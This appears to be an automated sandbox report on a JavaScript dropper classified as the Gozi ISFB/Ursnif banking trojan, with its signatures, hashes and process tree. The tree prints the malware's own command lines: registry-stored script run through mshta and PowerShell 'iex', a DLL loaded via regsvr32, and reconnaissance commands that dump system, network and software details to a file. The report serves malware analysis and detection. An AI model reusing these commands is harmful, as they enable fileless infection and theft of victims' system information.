Overview

overview

10

Static

static

presentation_p1f.js

windows7_x64

10

presentation_p1f.js

windows10_x64

10

Analysis

  • max time kernel
    150s
  • max time network
    101s
  • platform
    windows10_x64
  • resource
    win10v200410
  • submitted
    17-04-2020 22:47

Sharing

Copy URL
Twitter E-mail
Report Analysis Logs

General

  • Target

    presentation_p1f.js

  • Size

    1.3MB

  • MD5

    5024d780ce83091c9e3ec1501b1cce19

  • SHA1

    4f9c3b9aa21a5a4b638eef3902d26f2f562a0ed5

  • SHA256

    55a1a3a43322e94c4a2d9363a72aec52b16b7fc591f23601de1cfcb85559558c

  • SHA512

    96b888f75ac39d56510f8f3aac763bb32182a69c77f649b6349789d84f848ea2057d54a4b3e72ae3318c47814edb4311c57d93add609eb9e2c0334c3e8f5d2ba

Score
10/10
discoverybankertrojanursnifspywaregozi_ifsb

Malware Config

Signatures

  • Loads dropped DLL 1 IoCs
  • Suspicious use of AdjustPrivilegeToken 42 IoCs
  • Suspicious behavior: MapViewOfSection 6 IoCs
  • Gathers system information 1 TTPs 1 IoCs

    Runs systeminfo.exe.

  • Suspicious use of SetWindowsHookEx 12 IoCs
  • Suspicious use of SetThreadContext 6 IoCs
  • Suspicious behavior: CmdExeWriteProcessMemorySpam 1 IoCs
  • Checks for installed software on the system 1 TTPs 19 IoCs
    discovery
  • Suspicious use of WriteProcessMemory 75 IoCs
  • Enumerates processes with tasklist 1 TTPs 1 IoCs
  • Makes http(s) request 14 IoCs

    Contacts server via http/https, possibly for C2 communication.

  • Modifies Internet Explorer settings 1 TTPs 36 IoCs
    adwarespyware
  • Gozi, Gozi IFSB

    Gozi ISFB is a well-known and widely distributed banking trojan.

    bankertrojangozi_ifsb
  • Runs ping.exe 1 TTPs 1 IoCs
  • Discovers systems in the same network 1 TTPs 1 IoCs
    discovery
  • Suspicious use of FindShellTrayWindow 3 IoCs
  • Suspicious behavior: EnumeratesProcesses 1360 IoCs
  • Checks whether UAC is enabled 3 IoCs
  • Ursnif, Dreambot

    Ursnif is a variant of the Gozi IFSB with more capabilities.

    bankertrojanursnif
  • Reads user/profile data of web browsers 2 TTPs

    Infostealers often target stored browser data, which can include saved credentials etc.

    spyware
  • Runs net.exe

Processes

  • C:\Windows\Explorer.EXE
    C:\Windows\Explorer.EXE
    1⤵
    • Suspicious use of AdjustPrivilegeToken
    • Suspicious behavior: MapViewOfSection
    • Suspicious use of SetThreadContext
    • Suspicious use of WriteProcessMemory
    • Suspicious behavior: EnumeratesProcesses
    PID:3024
    • C:\Windows\system32\wscript.exe
      wscript.exe C:\Users\Admin\AppData\Local\Temp\presentation_p1f.js
      2⤵
      • Suspicious use of WriteProcessMemory
      PID:3940
      • C:\Windows\System32\regsvr32.exe
        "C:\Windows\System32\regsvr32.exe" C:\Users\Admin\AppData\Local\Temp\\FAwOkFRO.txt
        3⤵
        • Suspicious use of WriteProcessMemory
        PID:3180
        • C:\Windows\SysWOW64\regsvr32.exe
          C:\Users\Admin\AppData\Local\Temp\\FAwOkFRO.txt
          4⤵
          • Loads dropped DLL
          PID:3288
    • C:\Windows\System32\mshta.exe
      "C:\Windows\System32\mshta.exe" "about:<hta:application><script>resizeTo(1,1);eval(new ActiveXObject('WScript.Shell').RegRead('HKCU\\Software\\AppDataLow\\Software\\Microsoft\\786D016B-7752-6A8D-C12C-9B3E8520FF52\\Apdsprov'));if(!window.flag)close()</script>"
      2⤵
      • Suspicious use of WriteProcessMemory
      PID:3840
      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" iex ([System.Text.Encoding]::ASCII.GetString(( gp "HKCU:Software\AppDataLow\Software\Microsoft\786D016B-7752-6A8D-C12C-9B3E8520FF52").Assioker))
        3⤵
        • Suspicious use of AdjustPrivilegeToken
        • Suspicious behavior: MapViewOfSection
        • Suspicious use of SetThreadContext
        • Suspicious use of WriteProcessMemory
        • Suspicious behavior: EnumeratesProcesses
        PID:3096
        • C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
          "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\exxvxnld\exxvxnld.cmdline"
          4⤵
          • Suspicious use of WriteProcessMemory
          PID:916
          • C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
            C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES8F5A.tmp" "c:\Users\Admin\AppData\Local\Temp\exxvxnld\CSC8940D8B5CF8E47F7849DD4558B4302C.TMP"
            5⤵
              PID:1120
          • C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
            "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\jy3cpd2s\jy3cpd2s.cmdline"
            4⤵
            • Suspicious use of WriteProcessMemory
            PID:1268
            • C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
              C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES915E.tmp" "c:\Users\Admin\AppData\Local\Temp\jy3cpd2s\CSC993D7DA6D3F44BC9BDE9C8C0665B39AD.TMP"
              5⤵
                PID:1424
        • C:\Windows\System32\cmd.exe
          "C:\Windows\System32\cmd.exe" /C ping localhost -n 5 && del "C:\Users\Admin\AppData\Local\Temp\FAwOkFRO.txt"
          2⤵
          • Suspicious behavior: MapViewOfSection
          • Suspicious use of SetThreadContext
          • Suspicious use of WriteProcessMemory
          PID:1896
          • C:\Windows\system32\PING.EXE
            ping localhost -n 5
            3⤵
            • Suspicious behavior: CmdExeWriteProcessMemorySpam
            • Runs ping.exe
            PID:2488
        • C:\Windows\system32\cmd.exe
          cmd /C "nslookup myip.opendns.com resolver1.opendns.com > C:\Users\Admin\AppData\Local\Temp\6CDB.bi1"
          2⤵
            PID:3792
            • C:\Windows\system32\nslookup.exe
              nslookup myip.opendns.com resolver1.opendns.com
              3⤵
                PID:748
            • C:\Windows\system32\cmd.exe
              cmd /C "nslookup myip.opendns.com resolver1.opendns.com > C:\Users\Admin\AppData\Local\Temp\6CE3.bi1"
              2⤵
                PID:3832
                • C:\Windows\system32\nslookup.exe
                  nslookup myip.opendns.com resolver1.opendns.com
                  3⤵
                    PID:1360
                • C:\Windows\system32\cmd.exe
                  cmd /C "echo -------- >> C:\Users\Admin\AppData\Local\Temp\6CE3.bi1"
                  2⤵
                    PID:3092
                  • C:\Windows\system32\cmd.exe
                    cmd /C "echo -------- >> C:\Users\Admin\AppData\Local\Temp\6CDB.bi1"
                    2⤵
                      PID:3744
                    • C:\Program Files\Windows Mail\WinMail.exe
                      "C:\Program Files\Windows Mail\WinMail" OCInstallUserConfigOE
                      2⤵
                        PID:1948
                      • C:\Windows\system32\cmd.exe
                        cmd /C "systeminfo.exe > C:\Users\Admin\AppData\Local\Temp\8C10.bin1"
                        2⤵
                          PID:1048
                          • C:\Windows\system32\systeminfo.exe
                            systeminfo.exe
                            3⤵
                            • Gathers system information
                            PID:1260
                        • C:\Windows\system32\cmd.exe
                          cmd /C "echo -------- >> C:\Users\Admin\AppData\Local\Temp\8C10.bin1"
                          2⤵
                            PID:2148
                          • C:\Windows\system32\cmd.exe
                            cmd /C "net view >> C:\Users\Admin\AppData\Local\Temp\8C10.bin1"
                            2⤵
                              PID:3016
                              • C:\Windows\system32\net.exe
                                net view
                                3⤵
                                • Discovers systems in the same network
                                PID:800
                            • C:\Windows\system32\cmd.exe
                              cmd /C "echo -------- >> C:\Users\Admin\AppData\Local\Temp\8C10.bin1"
                              2⤵
                                PID:3004
                              • C:\Windows\system32\cmd.exe
                                cmd /C "nslookup 127.0.0.1 >> C:\Users\Admin\AppData\Local\Temp\8C10.bin1"
                                2⤵
                                  PID:3624
                                  • C:\Windows\system32\nslookup.exe
                                    nslookup 127.0.0.1
                                    3⤵
                                      PID:3976
                                  • C:\Windows\system32\cmd.exe
                                    cmd /C "echo -------- >> C:\Users\Admin\AppData\Local\Temp\8C10.bin1"
                                    2⤵
                                      PID:2812
                                    • C:\Windows\system32\cmd.exe
                                      cmd /C "tasklist.exe /SVC >> C:\Users\Admin\AppData\Local\Temp\8C10.bin1"
                                      2⤵
                                        PID:508
                                        • C:\Windows\system32\tasklist.exe
                                          tasklist.exe /SVC
                                          3⤵
                                          • Suspicious use of AdjustPrivilegeToken
                                          • Enumerates processes with tasklist
                                          PID:3464
                                      • C:\Windows\system32\cmd.exe
                                        cmd /C "echo -------- >> C:\Users\Admin\AppData\Local\Temp\8C10.bin1"
                                        2⤵
                                          PID:3488
                                        • C:\Windows\system32\cmd.exe
                                          cmd /C "driverquery.exe >> C:\Users\Admin\AppData\Local\Temp\8C10.bin1"
                                          2⤵
                                            PID:2448
                                            • C:\Windows\system32\driverquery.exe
                                              driverquery.exe
                                              3⤵
                                                PID:3712
                                            • C:\Windows\system32\cmd.exe
                                              cmd /C "echo -------- >> C:\Users\Admin\AppData\Local\Temp\8C10.bin1"
                                              2⤵
                                                PID:2904
                                              • C:\Windows\system32\cmd.exe
                                                cmd /C "reg.exe query "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall" /s >> C:\Users\Admin\AppData\Local\Temp\8C10.bin1"
                                                2⤵
                                                  PID:1044
                                                  • C:\Windows\system32\reg.exe
                                                    reg.exe query "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall" /s
                                                    3⤵
                                                    • Checks for installed software on the system
                                                    PID:2008
                                                • C:\Windows\system32\cmd.exe
                                                  cmd /C "echo -------- >> C:\Users\Admin\AppData\Local\Temp\8C10.bin1"
                                                  2⤵
                                                    PID:2148
                                                  • C:\Windows\system32\cmd.exe
                                                    cmd /U /C "type C:\Users\Admin\AppData\Local\Temp\8C10.bin1 > C:\Users\Admin\AppData\Local\Temp\8C10.bin & del C:\Users\Admin\AppData\Local\Temp\8C10.bin1"
                                                    2⤵
                                                      PID:2500
                                                  • C:\Windows\System32\RuntimeBroker.exe
                                                    C:\Windows\System32\RuntimeBroker.exe -Embedding
                                                    1⤵
                                                      PID:3508
                                                    • C:\Program Files\Internet Explorer\iexplore.exe
                                                      "C:\Program Files\Internet Explorer\iexplore.exe" -Embedding
                                                      1⤵
                                                      • Suspicious use of SetWindowsHookEx
                                                      • Suspicious use of WriteProcessMemory
                                                      • Modifies Internet Explorer settings
                                                      • Suspicious use of FindShellTrayWindow
                                                      • Checks whether UAC is enabled
                                                      PID:2556
                                                      • C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE
                                                        "C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:2556 CREDAT:82945 /prefetch:2
                                                        2⤵
                                                        • Suspicious use of SetWindowsHookEx
                                                        • Modifies Internet Explorer settings
                                                        • Checks whether UAC is enabled
                                                        PID:3876
                                                      • C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE
                                                        "C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:2556 CREDAT:82950 /prefetch:2
                                                        2⤵
                                                        • Suspicious use of SetWindowsHookEx
                                                        • Modifies Internet Explorer settings
                                                        • Checks whether UAC is enabled
                                                        PID:3708

                                                    Network

                                                    MITRE ATT&CK Enterprise v6

                                                    Replay Monitor

                                                    Loading Replay Monitor...

                                                    Downloads

                                                    • memory/1896-17-0x000002684C1C0000-0x000002684C1C1000-memory.dmp

                                                      Filesize

                                                      4KB

                                                      Download

                                                    • memory/1896-21-0x000002684E400000-0x000002684E4B1000-memory.dmp

                                                      Filesize

                                                      708KB

                                                      Download

                                                    • memory/1948-30-0x000001ECAB580000-0x000001ECAB581000-memory.dmp

                                                      Filesize

                                                      4KB

                                                      Download

                                                    • memory/2488-20-0x00000210C0D20000-0x00000210C0D21000-memory.dmp

                                                      Filesize

                                                      4KB

                                                      Download

                                                    • memory/2556-16-0x00000202ED4E0000-0x00000202ED4E1000-memory.dmp

                                                      Filesize

                                                      4KB

                                                      Download

                                                    • memory/3024-12-0x0000000000F70000-0x0000000000F71000-memory.dmp

                                                      Filesize

                                                      4KB

                                                      Download

                                                    • memory/3024-15-0x0000000003300000-0x00000000033B1000-memory.dmp

                                                      Filesize

                                                      708KB

                                                      Download

                                                    • memory/3024-31-0x0000000005AE0000-0x0000000005B91000-memory.dmp

                                                      Filesize

                                                      708KB

                                                      Download

                                                    • memory/3024-18-0x00000000059E0000-0x0000000005A91000-memory.dmp

                                                      Filesize

                                                      708KB

                                                      Download

                                                    • memory/3024-19-0x0000000003300000-0x00000000033B1000-memory.dmp

                                                      Filesize

                                                      708KB

                                                      Download

                                                    • memory/3096-13-0x000001D5A4C40000-0x000001D5A4CF1000-memory.dmp

                                                      Filesize

                                                      708KB

                                                      Download

                                                    • memory/3508-14-0x0000020A9F110000-0x0000020A9F111000-memory.dmp

                                                      Filesize

                                                      4KB

                                                      Download